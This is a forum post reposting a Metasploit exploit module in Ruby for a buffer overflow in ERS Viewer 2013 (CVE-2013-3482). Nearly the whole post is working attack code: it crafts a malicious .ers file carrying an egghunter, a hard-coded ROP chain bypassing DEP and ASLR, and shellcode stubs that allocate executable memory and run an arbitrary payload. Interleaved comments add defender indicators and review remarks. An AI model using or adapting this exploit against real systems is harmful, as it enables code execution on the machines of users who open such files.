ERS Viewer 2013 ERS File Handling Buffer Overflow

Desconectado Mayk0

« en: Julio 09, 2013, 05:47:36 pm »
===========================================
Date add:   2013-07-09
Category:   local exploits
Verified:   Verified
Risk:   Security Risk High
Platform:   windows
===========================================

Código: Ruby
  1. require 'msf/core'
  2.  
  # Metasploit file-format exploit module for CVE-2013-3482 (ERS Viewer 2013,
  # build 13.0.0.1151). It writes a crafted .ers file whose `DatasetHeader Begin`
  # block carries an oversized buffer, an egghunter and the encoded payload
  # (see #exploit). Two targets are defined in #initialize: one for a
  # NO DEP / NO ASLR configuration that returns into a `jmp eax` gadget, and a
  # default one that pivots the stack into a ROP chain (#create_rop_chain)
  # which allocates executable memory via VirtualAlloc.
  #
  # Defender notes, limited to what this module shows:
  #   * The affected component named in the description is rf_report_error in
  #     ermapper_u.dll; every gadget address is hard-coded for that one build
  #     (ermapper_u.dll / ethrlib.dll), so the module is version-specific.
  #   * A sample generated here is a text .ers file (default name 'msf.ers')
  #     whose `DatasetHeader Begin` line is followed by a line of binary bytes
  #     containing the egghunter and the 'w00t' egg tag, then ` End`; an .ers
  #     header line of this size and content is a usable file-level indicator.
  #   * Vendor references: CVE-2013-3482, OSVDB 93650, Secunia 53620.
  class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::FILEFORMAT
    include Msf::Exploit::Remote::Egghunter

    # Declares the module metadata (name, description, references, payload
    # constraints, the two targets) and registers the FILENAME option.
    # 'DefaultTarget' => 1 selects the 'DEP & ASLR bypass' target; only that
    # target defines 'RetNull' and 'VirtualAllocPtr', which #exploit and
    # #hunter_suffix read.
    #
    # @param info [Hash] base module info, merged via update_info
    def initialize(info={})
      super(update_info(info,
        'Name'           => "ERS Viewer 2013 ERS File Handling Buffer Overflow",
        'Description'    => %q{
          This module exploits a buffer overflow vulnerability found in ERS Viewer 2013.
        The vulnerability exists in the module ermapper_u.dll, where the function
        rf_report_error handles user provided data in a insecure way. It results in
        arbitrary code execution under the context of the user viewing a specially crafted
        .ers file. This module has been tested successfully with ERS Viewer 2013 (versions
        13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.
      },
        'License'        => MSF_LICENSE,
        'Author'         =>
          [
            'James Fitts', # Vulnerability Discovery
            'juan vazquez' # Metasploit
          ],
        'References'     =>
          [
            [ 'CVE', '2013-3482' ],
            [ 'OSVDB', '93650' ],
            [ 'URL', 'http://secunia.com/advisories/53620/' ]
          ],
        'Payload'        =>
          {
            'Space'    => 4000,
            'DisableNops' => true,
          },
        'DefaultOptions'  =>
          {
            'ExitFunction' => "process",
          },
        'Platform'       => 'win',
        'Targets'        =>
          [
            # Tested on Windows XP SP3
            [ 'ERS Viewer 2013 13.0.0.1151 / NO DEP / NO ASLR',
              {
                'Offset' => 191,
                'Ret' => 0x100329E9 # jmp eax # from ermapper_u.dll
              }
            ],
            # Tested on Windows XP SP3 and Windows 7 SP1
            [ 'ERS Viewer 2013 13.0.0.1151 / DEP & ASLR bypass',
              {
                'Offset' => 191,
                'Ret' => 0x100E1152,     # xchg eax, esp # ret # from ermapper_u.dll
                'RetNull' => 0x30d07f00, # ret ending with null byte # from ethrlib.dll
                'VirtualAllocPtr' => 0x1010c0f4
              }
            ]
          ],
        'Privileged'     => false,
        'DisclosureDate' => "May 23 2013",
        'DefaultTarget'  => 1))

      register_options(
        [
          OptString.new('FILENAME', [ true, 'The file name.',  'msf.ers']),
        ], self.class)

    end

    # Returns the ROP chain used by the 'DEP & ASLR bypass' target, packed as
    # little-endian 32-bit words (pack("V*")). Gadget order is significant;
    # do not reorder. Per the gadget comments it resolves VirtualAlloc through
    # the ermapper_u.dll IAT entry and appears to stage its arguments in
    # registers ahead of the final PUSHAD.
    #
    # NOTE(review): 0x1010c0f4 below duplicates target['VirtualAllocPtr'] from
    # #initialize; keeping a single source would avoid the two drifting apart.
    # NOTE(review): the array is already flat, so `.flatten` is a no-op here.
    #
    # @return [String] packed gadget addresses and constants
    def create_rop_chain()
      # rop chain generated with mona.py - www.corelan.be
      rop_gadgets =
        [
          0x10082624,    # POP EAX # RETN [ermapper_u.dll]
          0x1010c0f4,    # ptr to &VirtualAlloc() [IAT ermapper_u.dll]
          0x1001a9c0,    # MOV EAX,DWORD PTR DS:[EAX] # RETN [ermapper_u.dll]
          0x1005db36,    # XCHG EAX,ESI # RETN [ermapper_u.dll]
          0x10105d87,    # POP EBX # RETN [ermapper_u.dll]
          0xffffffff,    #
          0x30d059d9,    # INC EBX # RETN [ethrlib.dll]
          0x30d059d9,    # INC EBX # RETN [ethrlib.dll]
          0x100e9dd9,    # POP EAX # RETN [ermapper_u.dll]
          0xa2dbcf75,    # put delta into eax (-> put 0x00001000 into edx)
          0x1001aa04,    # ADD EAX,5D24408B # RETN [ermapper_u.dll]
          0x10016a98,    # XCHG EAX,EDX # OR EAX,4C48300 # POP EDI # POP EBP # RETN [ermapper_u.dll]
          0x10086d21,    # RETN (ROP NOP) [ermapper_u.dll]
          0x1001a148,    # & push esp # ret  [ermapper_u.dll]
          0x10082624,    # POP EAX # RETN [ermapper_u.dll]
          0xffffffc0,    # Value to negate, will become 0x00000040
          0x100f687d,    # NEG EAX # RETN [ermapper_u.dll]
          0x1001e720,    # XCHG EAX,ECX # ADC EAX,5DE58B10 # RETN [ermapper_u.dll]
          0x100288b5,    # POP EAX # RETN [ermapper_u.dll]
          0x90909090,    # nop
          0x100e69e0,    # PUSHAD # RETN [ermapper_u.dll]
        ].flatten.pack("V*")

      return rop_gadgets
    end

    # Restore the stack pointer in order to execute the final payload successfully
    #
    # Returns a short x86 stub that, per the inline comments, reloads ESP from
    # the TEB stack-limit pointer (plus an offset) before the encoded payload
    # runs. #exploit prepends it to payload.encoded for both targets.
    #
    # @return [String] raw x86 bytes
    def fix_stack
      pivot = "\x64\xa1\x18\x00\x00\x00"  # mov eax, fs:[0x18] # get teb
      pivot << "\x83\xC0\x08"             # add eax, byte 8 # get pointer to stacklimit
      pivot << "\x8b\x20"                 # mov esp, [eax] # put esp at stacklimit
      pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
      return pivot
    end

    # In the Windows 7 case, in order to bypass ASLR/DEP successfully, after finding
    # the payload on memory we can't jump there directly, but allocate executable memory
    # and jump there. Badchars: "\x0a\x0d\x00"
    #
    # Builds the stub that #exploit splices into the egghunter in place of its
    # final jump for the 'DEP & ASLR bypass' target: it calls VirtualAlloc
    # through target['VirtualAllocPtr'], copies +payload_length+ bytes from the
    # located egg into the new region, and jumps there.
    #
    # Only reached for the second target; the first target does not define
    # 'VirtualAllocPtr', so calling this under it would pack nil.
    #
    # @param payload_length [Integer] bytes to copy; packed as an unsigned
    #   16-bit value (pack("v")), so it must fit in 16 bits and, given the
    #   badchars above, contain no 0x00 byte (the padding loop in #exploit
    #   guarantees this)
    # @return [String] raw x86 bytes
    def hunter_suffix(payload_length)
      # push flProtect (0x40)
      suffix = "\xB8\xC0\xFF\xFF\xFF"                              # mov eax, 0xffffffc0
      suffix << "\xF7\xD8"                                         # neg eax
      suffix << "\x50"                                             # push eax
      # push flAllocationType (0x3000)
      suffix << "\x66\x05\xC0\x2F"                                 # add ax, 0x2fc0
      suffix << "\x50"                                             # push eax
      # push dwSize (0x1000)
      suffix << "\x66\x2D\xFF\x1F"                                 # sub ax, 0x1fff
      suffix << "\x48"                                             # dec eax
      suffix << "\x50"                                             # push eax
      # push lpAddress
      suffix << "\xB8\x0C\x0C\x0C\x0C"                             # mov eax, 0x0c0c0c0c
      suffix << "\x50" # push eax
      # Call VirtualAlloc
      suffix << "\xFF\x15" + [target['VirtualAllocPtr']].pack("V") # call ds:VirtualAlloc
      # Copy payload (edi) to Allocated memory (eax)
      suffix << "\x89\xFE"                                         # mov esi, edi
      suffix << "\x89\xC7"                                         # mov edi, eax
      suffix << "\x31\xC9"                                         # xor ecx, ecx
      suffix << "\x66\x81\xC1" + [payload_length].pack("v")        # add cx, payload_length
      suffix << "\xF3\xA4"                                         # rep movsb
      # Jmp to the final payload (eax)
      suffix << "\xFF\xE0"                                         # jmp eax

      return suffix
    end

    # Assembles the crafted .ers content for the selected target and writes it
    # with file_create (FILENAME option). In both targets the egghunter
    # (+hunter+) sits in the buffer before the saved return address at
    # target['Offset'], and the egg (+egg+, the payload tagged 'w00t') follows
    # it; only the bytes in front of the egghunter differ per target.
    #
    # NOTE(review): the `\xff\xe7` regex below and the raw byte strings in
    # #fix_stack / #hunter_suffix need a binary source encoding (Metasploit
    # modules carry a `# -*- coding: binary -*-` magic comment). The listing as
    # posted has no such header, so confirm against the upstream file before
    # treating this copy as faithful.
    def exploit

      #These badchars do not apply to the final payload
      badchars = [0x0c, 0x0d, 0x0a].pack("C*")

      eggoptions =
        {
          :checksum => true,
          :eggtag => 'w00t'
        }
      my_payload = fix_stack + payload.encoded

      if target.name =~ /DEP & ASLR bypass/
        # The payload length can't include NULL's in order to
        # build the stub which will copy the final payload to
        # executable memory
        # (the 16-bit length is embedded in #hunter_suffix via pack("v");
        # padding with random bytes until no 0x00 appears keeps it clean)
        while [my_payload.length].pack("v").include?("\x00")
          my_payload << rand_text(1)
        end
      end

      hunter,egg = generate_egghunter(my_payload, badchars, eggoptions)

      if target.name =~ /DEP & ASLR bypass/
        # Swap the egghunter's terminating ff e7 (jmp edi) for the
        # VirtualAlloc-and-copy stub; gsub! is not chained, so its nil on
        # no-match is harmless here.
        hunter.gsub!(/\xff\xe7/, hunter_suffix(my_payload.length))
      end

      # +buf+ would stay nil if a target name matched neither regex; both
      # targets declared in #initialize match one of them, so that path is
      # unreachable as written.
      if target.name =~ /NO DEP/
        buf = rand_text_alpha(1)
        buf << (0x01..0x04).to_a.pack("C*") # Necessary to align EAX as expected
        buf << "AA" # EAX pointing to buf[5] prefixed with 0x00 after ret
        buf << hunter
        buf << rand_text_alpha(target['Offset'] - buf.length)
        buf << [target.ret].pack("V") # jmp eax
        buf << rand_text_alpha(8)
        buf << egg
      elsif target.name =~ /DEP & ASLR bypass/
        buf = rand_text_alpha(1)
        buf << (0x01..0x04).to_a.pack("C*") # Necessary to align EAX as expected
        buf << [target['RetNull']].pack("V")[1,3] # EAX pointing to buf[5] prefixed with 0x00 after ret
        buf << create_rop_chain
        buf << hunter
        buf << rand_text_alpha(target['Offset'] - buf.length)
        buf << [target.ret].pack("V") # xchg eax, esp # ret
        buf << rand_text_alpha(8)
        buf << egg
      end

      # The whole buffer lands on a single line inside the DatasetHeader block
      # of an otherwise plain-text .ers file.
      ers = %Q|
DatasetHeader Begin
#{buf} End
    |

      file_create(ers)
    end
  end
  199.  
« Última modificación: Julio 09, 2013, 06:56:25 pm por Snifer »